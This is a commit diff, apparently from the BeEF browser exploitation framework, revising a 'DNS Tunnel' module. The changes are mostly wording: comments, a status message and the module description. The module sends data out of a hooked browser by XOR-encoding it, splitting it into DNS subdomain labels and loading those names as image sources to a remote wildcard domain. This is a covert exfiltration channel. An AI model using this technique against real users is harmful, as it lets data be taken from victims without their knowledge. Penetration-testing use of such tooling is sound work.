bcoles
@@ -14,16 +14,16 @@
|
||||
// limitations under the License.
|
||||
//
|
||||
/*
|
||||
Poor man's omni-directional DNS tunnel in JavaScript.
|
||||
Poor man's unidirectional DNS tunnel in JavaScript.
|
||||
The largely-untested, highly experimental first draft.
|
||||
|
||||
How it works:
|
||||
|
||||
A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information.
|
||||
|
||||
A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The queries are sent in sequence however there are plans to randomize the order.
|
||||
A domain and message are taken as input. The message is XOR'd, url encoded, the "%" are replaced with "." and the message is split into segments of 230 bytes. The segments are sent in sequence however there are plans to randomize the order.
|
||||
|
||||
To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. The final domain name used in the query is structured as follows:
|
||||
To allow the original message to be pieced back together each message is allocated an id and each DNS query is given a sequence number. The final domain name used in the DNS query is structured as follows:
|
||||
|
||||
MESSAGE_ID.SEGMENT_SEQUENCE_NUMBER.TOTAL_SEGMENTS.XOR_KEY.MESSAGE_SEGMENT.REMOTE_DOMAIN
|
||||
|
||||
@@ -37,15 +37,10 @@ o Domain names are limited to 255 characters in length (including dots)
|
||||
o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
|
||||
o Subdomains are limited to 63 characters in length (including the trailing dot)
|
||||
|
||||
Each query is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed.
|
||||
|
||||
Features:
|
||||
o Does not use DNS pre-fetching - The downside is that the requests will take a while to timeout unless the DNS server is configured to reply with NXDOMAIN (ie, blackholed) for all requests.
|
||||
o Encryption - Uses very weak "encryption" (XOR) and the key is transferred with the request.
|
||||
o Randomization - Each segment is given a sequence id. TODO: Send segments in a random order.
|
||||
Each segment is sent by appending an image to the DOM containing the query as the image source. The images are later destroyed.
|
||||
|
||||
Caveats:
|
||||
o Omni-directional - Data can only be sent one way.
|
||||
o Unidirectional - Data can only be sent one way.
|
||||
o Message size - Limited to messages less than 64KB in length.
|
||||
o Limited by JavaScript strings. Byte code needs to be converted to a compatible string before it can be sent. There's also lots of wasted space. Converting to hex would be much cleaner and would save a few bytes for each query.
|
||||
o Throttling - There is no throttling. The browser may only initiate x amount of simultaneous connections. The requests should be throttled to avoid hitting the cap. TODO: Introduce a wait delay between each request to partially account for this.
|
||||
@@ -64,7 +59,7 @@ beef.execute(function() {
|
||||
var domain = "<%= @domain %>";
|
||||
var message = "<%= @message %>";
|
||||
|
||||
beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num) } );
|
||||
beef.net.dns.send(msgId, message, domain, wait, function(num) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'dns_requests='+num+' requests sent') } );
|
||||
|
||||
});
|
||||
|
||||
|
||||
@@ -19,7 +19,7 @@ beef:
|
||||
enable: true
|
||||
category: "IPEC"
|
||||
name: "DNS Tunnel"
|
||||
description: "Sends data over DNS to a server which accepts wildcard subdomains."
|
||||
description: "This module sends data one way over DNS.<br/><br/>A domain and message are taken as input. The message is XOR'd, url encoded, the '%' are replaced with '.' and the message is split into segments of 230 bytes. The segments are sent in sequence along with the sequence number and XOR key.<br/><br/>Note: A remote domain with a DNS server configured to accept wildcard subdomains is required to receive the data. BeEF does not support this feature so you're on your own when it comes to decoding the information."
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
working: "All"
|
||||
|
||||
Reference in New Issue
Block a user